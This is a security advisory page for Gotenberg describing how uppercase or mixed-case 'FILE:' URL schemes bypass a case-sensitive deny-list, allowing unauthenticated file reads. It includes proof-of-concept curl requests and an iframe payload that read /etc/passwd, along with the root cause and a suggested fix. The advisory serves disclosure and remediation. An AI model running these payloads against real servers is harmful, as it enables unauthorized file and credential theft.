EUVD-2026-17198
GHSA-jjwv-57xh-xr6r
CVSS Vector
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
4Description
### Impact The fix introduced in version 8.1.0 for GHSA-rh2x-ccvw-q7r3 (CVE-2024-21527) can be bypassed using mixed-case or uppercase URL schemes. The default `--chromium-deny-list` value is `^file:(?!//\/tmp/).*`. This regex is anchored to lowercase `file:` at the start. However, per RFC 3986 Section 3.1, URI schemes are case-insensitive. Chromium normalizes the scheme to lowercase before navigation, so a URL like `FILE:///etc/passwd` or `File:///etc/passwd` bypasses the deny-list check but still gets resolved by Chromium as `file:///etc/passwd`. The root cause is in `pkg/gotenberg/filter.go` - the `FilterDeadline` function compiles the deny-list regex with `regexp2.MustCompile(denied.String(), 0)`, where `0` means no flags (case-sensitive). Since the regex pattern itself doesn't include a `(?i)` flag, matching is strictly case-sensitive. This affects both the URL endpoint and HTML conversion (via iframes, link tags, etc.). ### Steps to Reproduce 1. Start Gotenberg with default settings: ```bash docker run --rm -p 3000:3000 gotenberg/gotenberg:8.26.0 gotenberg ``` 2. Read `/etc/passwd` via the URL endpoint using an uppercase scheme: ```bash curl -X POST 'http://localhost:3000/forms/chromium/convert/url' \ --form 'url=FILE:///etc/passwd' -o output.pdf ``` 3. Open `output.pdf` - it contains the contents of `/etc/passwd`. 4. Alternatively, create an `index.html`: ```html <iframe src="FILE:///etc/passwd" width="100%" height="100%"></iframe> ``` Then convert it: ```bash curl -X POST 'http://localhost:3000/forms/chromium/convert/html' \ -F '[email protected]' -o output.pdf ``` 5. The resulting PDF contains `/etc/passwd` contents. Mixed-case variants like `File:`, `fILE:`, `fiLE:` etc. all work as well. ### Root Cause - `pkg/modules/chromium/chromium.go` defines the default deny-list as `^file:(?!//\/tmp/).*` - `pkg/gotenberg/filter.go` compiles this with `regexp2.MustCompile(denied.String(), 0)` - flag `0` means case-sensitive - `pkg/modules/chromium/events.go` uses `FilterDeadline` to check intercepted request URLs against the deny-list - Chromium normalizes URL schemes to lowercase, so `FILE:///etc/passwd` becomes `file:///etc/passwd` after the deny-list check has already passed ### Suggested Fix Change the default deny-list regex to use a case-insensitive flag: ``` (?i)^file:(?!//\/tmp/).* ``` Or apply case-insensitive matching in `FilterDeadline` when compiling the regex. ### Severity This is effectively the same impact as CVE-2024-21527 - unauthenticated arbitrary file read from the Gotenberg container. An attacker can leak environment variables, configuration, credentials, and other sensitive data.
Analysis
Gotenberg PDF conversion service versions 8.1.0-8.28.x allow unauthenticated arbitrary file disclosure through case-variant URI scheme bypass. A previous CVE-2024-21527 patch implemented a case-sensitive deny-list regex (^file:(?!//\/tmp/).*) to block file:// access, but attackers can bypass it using FILE://, File://, or other mixed-case variants. …
Sign in for full analysis, threat intelligence, and remediation guidance.
Remediation
Within 24 hours: Identify all Gotenberg instances in production and confirm version numbers (8.1.0-8.28.x are vulnerable). Within 7 days: Upgrade all affected Gotenberg deployments to version 8.29.0 or later. …
Sign in for detailed remediation steps.
Priority Score
Vendor Status
Share
External POC / Exploit Code
Leaving vuln.today